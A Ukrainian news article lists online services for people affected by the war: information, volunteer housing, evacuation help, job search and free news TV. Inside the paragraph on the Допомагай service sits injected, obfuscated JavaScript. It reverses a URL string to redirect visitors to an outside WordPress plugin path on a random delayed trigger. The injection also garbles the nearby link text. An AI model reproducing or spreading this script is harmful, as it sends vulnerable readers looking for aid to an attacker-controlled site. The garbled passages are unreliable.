НовиниОнлайн-сервіси, які будуть корисні під час війни

Онлайн-сервіси, які будуть корисні під час війни

-

Онлайн-сервіси, які будуть корисні під час війни

Кожен день в Україні запускаються корисні онлайн-сервіси, де люди можуть знайти житло, потрібну інформацію та волонтерську допомогу на час воєнного стану. Розкажемо про деякі з них детальніше.

ВзаємоДія – пошук інформації

Платформа для швидкого та легкого пошуку інформації під час війни. Тут кожен знайде відповідь на потрібне йому «що робити, якщо…,», де знайти житло/транспорт/ліки, як перейти кордон та на які канали та акаунти в соцмережах варто підписатися. Розділи постійно поповнюються, а ресурси ретельно перевіряються командою фахівців. 

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopomagai.org/”>Допомагай – допомога від волонтерів

Ще один волонтерський проєкт, що допоможе знайти житло або запропонувати його. Хости вказують, скільки людей та на який термін готові прийняти, чи можливе заселення з домашніми тваринами. На сайті також є номер гарячої лінії: 0-(800)-332-238, волонтери-оператори цілодобово приймають дзвінки.

Через сервіс можна отримати допомогу з евакуацією або гуманітаркою. Окремо є розділ з корисною інформацією, де зібрані перевірені та актуальні застосунки для смартфонів, адреси координаційних штабів, контакти територіальних громад та інші дані.

tok.in.ua/”>Прихисток допоможе знайти притулок

Тут можна подати заявку на пошук тимчасового притулку та/або повідомити про готовність прийняти у себе тих, кому це необхідно. Якщо ви готові прихистити співгромадян, тисніть на кнопку «Надати житло».

Також сервіс пропонує довідник практичних порад: як поводитися під час бойових дій, як надати першу медичну допомогу, а також інформацію, необхідну для виїзду за кордон.

UA Talents – пошук роботи

Платформа працевлаштування «UA Talents» призначена для українців, які вимушено переїхали в ЄС або інший регіон України через війну. Вже зараз на платформі можна знайти близько 5 тисяч пропозицій працевлаштування. Реєстрація у сервісі дуже проста – разом зі створенням резюме доведеться витратити не більше 15 хвилин.

«Київстар ТБ» — доступ до інформації

Під час війни сервіс цифрового інтерактивного телебачення «Київстар ТБ» надає всім своїм абонентам безкоштовну можливість перегляду новинних каналів.

Тож, якщо національне мовлення раптом зникне, тут можна дивитися всеукраїнський новинний марафон на 1+1, UA: Перший, Україна 24, Рада, ICTV, СТБ онлайн. Також сервіс пропонує перегляд корисних відеороликів, що вчать цивільних громадян правил поводження під час воєнного стану.

Отримати доступ у додаток дуже просто – достатньо ввести номер телефону або дані для входу до послуги «Домашній Інтернет».

 

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам